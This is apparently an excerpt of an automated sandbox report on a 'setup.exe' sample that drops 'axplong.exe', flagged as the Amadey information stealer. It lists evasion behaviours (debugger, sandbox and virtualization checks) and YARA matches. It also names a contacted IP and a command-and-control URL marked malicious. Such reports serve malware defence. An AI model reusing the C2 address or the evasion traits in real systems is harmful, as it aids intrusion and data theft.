Source: C:\Users\user\Desktop\setup.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
Source: axplong.exe, axplong.exe, 0000000D.00000002.2507175022.0000000000C71000.00000040.00000001.01000000.00000008.sdmp Binary or memory string: TProgram Manager
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 13_2_00A8D312 cpuid 13_2_00A8D312
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 13_2_00A8CB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 13_2_00A8CB1A

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 13.2.axplong.exe.a70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.axplong.exe.a70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.setup.exe.c50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.1247561021.0000000004610000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1335650088.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1346668514.0000000000A71000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000003.1562495489.0000000004900000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.2504989178.0000000000A71000.00000040.00000001.01000000.00000008.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.1306286454.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1483214 Sample: setup.exe Startdate: 26/07/2024 Architecture: WINDOWS Score: 100 22 Found malware configuration 2->22 24 Antivirus detection for URL or domain 2->24 26 Antivirus / Scanner detection for submitted sample 2->26 28 6 other signatures 2->28 6 setup.exe 5 2->6         started        10 axplong.exe 12 2->10         started        process3 dnsIp4 16 C:\Users\user\AppData\Local\...\axplong.exe, PE32 6->16 dropped 18 C:\Users\user\...\axplong.exe:Zone.Identifier, ASCII 6->18 dropped 30 Detected unpacking (changes PE section rights) 6->30 32 Tries to evade debugger and weak emulator (self modifying code) 6->32 34 Tries to detect virtualization through RDTSC time measurements 6->34 13 axplong.exe 6->13         started        20 185.215.113.16, 49704, 49705, 49706 WHOLESALECONNECTIONSNL Portugal 10->20 36 Hides threads from debuggers 10->36 38 Tries to detect sandboxes / dynamic malware analysis system (registry check) 10->38 40 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 10->40 file5 signatures6 process7 signatures8 42 Antivirus detection for dropped file 13->42 44 Multi AV Scanner detection for dropped file 13->44 46 Detected unpacking (changes PE section rights) 13->46 48 6 other signatures 13->48
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.215.113.16
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://185.215.113.16/Jo89Ku7d/index.php true
  • Avira URL Cloud: phishing
 unknown